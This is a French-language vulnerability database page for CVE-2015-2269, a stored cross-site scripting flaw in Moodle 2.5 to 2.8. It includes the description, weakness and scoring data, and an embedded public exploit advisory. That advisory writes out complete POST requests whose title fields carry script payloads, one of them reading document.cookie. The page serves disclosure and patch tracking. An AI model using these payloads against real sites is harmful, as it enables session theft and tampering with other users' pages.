CVE-2015-2269 : Détail

CVE-2015-2269

Cross-site Scripting
A03-Injection
0.18%V3
Network
2015-06-01
17h00 +00:00
2015-06-01
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple cross-site scripting (XSS) vulnerabilities in lib/javascript-static.js in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allow remote authenticated users to inject arbitrary web script or HTML via a (1) alt or (2) title attribute in an IMG element.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 36418

Date de publication : 2015-03-16 23h00 +00:00
Auteur : LiquidWorm
EDB Vérifié : No

 Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 CVE ID: CVE-2015-2269 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 09.02.2015 -- Random Glossary Entry --------------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST http://WEB/my/index.php HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST http://WEB/blog/index.php HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script>

Products Mentioned

Configuraton 0

Moodle>>Moodle >> Version To (including) 2.5.9

Moodle>>Moodle >> Version 2.5.0

Moodle>>Moodle >> Version 2.5.1

Moodle>>Moodle >> Version 2.5.2

Moodle>>Moodle >> Version 2.5.3

Moodle>>Moodle >> Version 2.5.4

Moodle>>Moodle >> Version 2.5.5

Moodle>>Moodle >> Version 2.5.6

Moodle>>Moodle >> Version 2.5.7

Moodle>>Moodle >> Version 2.5.8

Moodle>>Moodle >> Version 2.6.0

Moodle>>Moodle >> Version 2.6.1

Moodle>>Moodle >> Version 2.6.2

Moodle>>Moodle >> Version 2.6.3

Moodle>>Moodle >> Version 2.6.4

Moodle>>Moodle >> Version 2.6.5

Moodle>>Moodle >> Version 2.6.6

Moodle>>Moodle >> Version 2.6.7

Moodle>>Moodle >> Version 2.6.8

Moodle>>Moodle >> Version 2.7.0

Moodle>>Moodle >> Version 2.7.1

Moodle>>Moodle >> Version 2.7.2

Moodle>>Moodle >> Version 2.7.3

Moodle>>Moodle >> Version 2.7.4

Moodle>>Moodle >> Version 2.7.5

Moodle>>Moodle >> Version 2.8.0

Moodle>>Moodle >> Version 2.8.1

Moodle>>Moodle >> Version 2.8.2

Moodle>>Moodle >> Version 2.8.3

Références

http://openwall.com/lists/oss-security/2015/03/16/1
Tags : mailing-list, x_refsource_MLIST